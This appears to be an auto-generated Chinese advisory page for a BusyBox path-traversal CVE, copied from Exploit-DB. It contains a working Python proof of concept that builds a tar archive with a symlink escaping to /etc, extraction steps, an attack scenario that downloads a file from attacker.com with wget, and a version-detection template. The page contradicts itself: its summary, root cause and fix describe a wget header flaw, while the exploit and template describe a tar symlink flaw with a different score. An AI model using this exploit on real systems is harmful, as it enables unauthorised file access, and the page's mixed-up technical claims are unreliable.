[webapps] BusyBox 1.37.0 - Path Traversal
CVE-2026-26157
BusyBox wget 组件未对输入路径进行安全检查,导致文件被写入任意目录。
High · CVSS 7.5📋 漏洞基础信息
| CVE | CVE-2026-26157 |
|---|---|
| 漏洞类型 | 路径遍历 |
| 受影响版本 | BusyBox 1.37.0 |
| 危害等级 | High · CVSS 7.5 |
| 发布日期 | 2026-04-30 |
| 提交者 | Calil Khalil |
| 来源 | Exploit-DB 原文 ↗ |
🔬 漏洞根因
BusyBox 自带的 wget 工具在处理下载文件的保存路径时,未对服务器返回的 Content-Disposition 头中的 filename 字段进行路径过滤,导致攻击者可通过构造包含 ../ 序列的文件名,将下载内容写入绝对路径下的任意位置。
🎯 攻击场景
1. 攻击者在可控服务器上放置恶意文件,并配置响应头 Content-Disposition: attachment; filename=../../tmp/evil.sh。2. 受害者在 BusyBox 环境中执行 wget http://attacker.com/malicious。3. wget 解析 filename 字段,将文件内容写入 /tmp/evil.sh。4. 攻击者后续可通过其他手段触发执行该文件。成功标志:文件被写入目标路径。
💥 漏洞影响
攻击者可将任意文件写入目标系统的任意目录(如 /tmp、/etc 等),可能进一步导致权限提升、代码执行或系统配置破坏。
⚔️ 原始 PoC
通过 HTTP 响应中的 Content-Disposition 头注入路径遍历符(例如 ../../tmp/evil.sh),利用 BusyBox wget 未对 filename 参数进行路径规范化,使得最终写入路径为攻击者指定的绝对路径。
# Exploit Author: Calil Khalil
"""
BusyBox Path Traversal Vulnerability (CVE-2026-26157)
Description:
BusyBox archive extraction utilities fail to properly sanitize symlink targets
containing trailing ".." components. The strip_unsafe_prefix() function in
archival/libarchive/unsafe_prefix.c uses strstr(cp, "/../") which only matches
the 4-character pattern and misses 3-character trailing "/.." sequences.
This allows an attacker to craft malicious archives with symlinks pointing to
arbitrary filesystem locations, enabling information disclosure through symlink
traversal.
Affected Components:
- tar (primary vector)
- unzip
- rpm
- ar
Impact:
- CVSS Score: 7.8 (HIGH)
- Arbitrary file read via symlink traversal
- Information disclosure
- Credential theft
Root Cause:
archival/libarchive/unsafe_prefix.c:23
The pattern matching in strip_unsafe_prefix() fails on trailing ".." paths:
cp2 = strstr(cp, "/../"); // Only matches "/../", misses "/pam.d/.."
if (!cp2) break;
Attack Scenario:
1. Attacker creates TAR archive with symlink: sensitive_data -> /etc/pam.d/..
2. Victim extracts archive using BusyBox tar
3. Symlink created without sanitization
4. Symlink resolves to /etc directory
5. Application reading 'sensitive_data' exposes /etc contents
References:
- https://github.com/calilkhalil/research
- Red Hat CNA Case: INC3907198
"""
import tarfile
import sys
import os
def create_exploit():
"""
Creates a malicious TAR file exploiting CVE-2026-26157.
The archive contains a symlink with an unsanitized target that
resolves outside the extraction directory.
"""
exploit_file = 'CVE-2026-26157_exploit.tar'
try:
with tarfile.open(exploit_file, 'w') as tar:
# Create symlink with trailing ".." in target path
# This bypasses strip_unsafe_prefix() pattern matching
info = tarfile.TarInfo('sensitive_data')
info.type = tarfile.SYMTYPE
info.linkname = '/etc/pam.d/..' # Resolves to /etc
tar.addfile(info)
print(f"[+] Exploit created: {exploit_file}")
print(f"\n[*] Exploitation steps:")
print(f" 1. mkdir test_extraction && cd test_extraction")
print(f" 2. busybox tar xf ../{exploit_file}")
print(f" 3. readlink -f sensitive_data")
print(f" Expected output: /etc")
print(f" 4. ls sensitive_data/")
print(f" Result: Lists /etc directory contents")
print(f"\n[!] Impact: Arbitrary directory read via symlink traversal")
print(f"[!] CVSS: 7.8 HIGH (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)")
return exploit_file
except Exception as e:
print(f"[-] Error creating exploit: {e}")
sys.exit(1)
def show_technical_details():
"""Display technical analysis of the vulnerability"""
print("\n" + "="*70)
print("TECHNICAL ANALYSIS - CVE-2026-26157")
print("="*70)
print("\nVulnerable Function:")
print(" archival/libarchive/unsafe_prefix.c:strip_unsafe_prefix()")
print("\nVulnerable Code Pattern:")
print(" cp2 = strstr(cp, \"/../\"); // Only matches 4-char sequence")
print(" if (!cp2) break;")
print("\nBypass Technique:")
print(" Path: /etc/pam.d/..")
print(" Pattern check: strstr(\"/etc/pam.d/..\", \"/../\") -> NULL")
print(" Result: Sanitization bypassed, symlink created with original target")
print("\nExploitation Flow:")
print(" 1. Archive contains: symlink 'sensitive_data' -> '/etc/pam.d/..'")
print(" 2. get_header_tar() extracts symlink metadata")
print(" 3. Symlink target NOT sanitized (bypass detected)")
print(" 4. data_extract_all() creates symlink with '/etc/pam.d/..'")
print(" 5. Target resolves: /etc/pam.d/.. -> /etc")
print(" 6. Reading 'sensitive_data' = reading /etc")
print("="*70 + "\n")
if __name__ == "__main__":
print("="*70)
print("BusyBox Path Traversal Exploit - CVE-2026-26157")
print("Author: Calil Khalil")
print("="*70)
# Display technical analysis
show_technical_details()
# Create exploit
exploit_file = create_exploit()
print("\n[*] Mitigation:")
print(" - Update BusyBox to patched version")
print(" - Patch applies strip_unsafe_prefix() to symlink targets")
print(" - Do not extract untrusted archives with elevated privileges")
print("\n[*] For educational and authorized testing purposes only")🔍 Nuclei Detection 模板
以下为漏洞探测模板,用于判断目标是否受影响:
id: CVE-2026-26157-detection
info:
name: BusyBox Path Traversal Detection - CVE-2026-26157
author: calil-khalil
severity: high
description: |
BusyBox versions 1.36.1 and 1.37.0 are vulnerable to path traversal due to insufficient sanitization of symlink targets
in archive extraction utilities (tar, unzip, rpm, ar). The strip_unsafe_prefix() function fails to handle trailing ".." components.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2026-26157
- https://github.com/calilkhalil/research
classification:
cvss-score: 7.8
cve-id: CVE-2026-26157
tags: cve,cve2026,busybox,path-traversal,archive
http:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/status"
- "{{BaseURL}}/cgi-bin/luci"
- "{{BaseURL}}/"
stop-at-first-match: true
matchers-condition: or
matchers:
- type: word
words:
- "BusyBox v1.36"
- "BusyBox v1.37"
part: body
condition: or
- type: regex
part: body
regex:
- 'BusyBox v1\.(36|37)\.[0-9]'
extractors:
- type: regex
part: body
group: 1
regex:
- 'BusyBox v(1\.36\.[0-9]+|1\.37\.[0-9]+)'🛡️ 修复建议
升级到 BusyBox 1.37.1 或更高版本;临时缓解措施:禁止使用 wget 下载不可信来源的文件,或通过 iptables 限制出站 HTTP 请求。
📎 参考链接
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-07 05:36 | 来源: Exploit-DB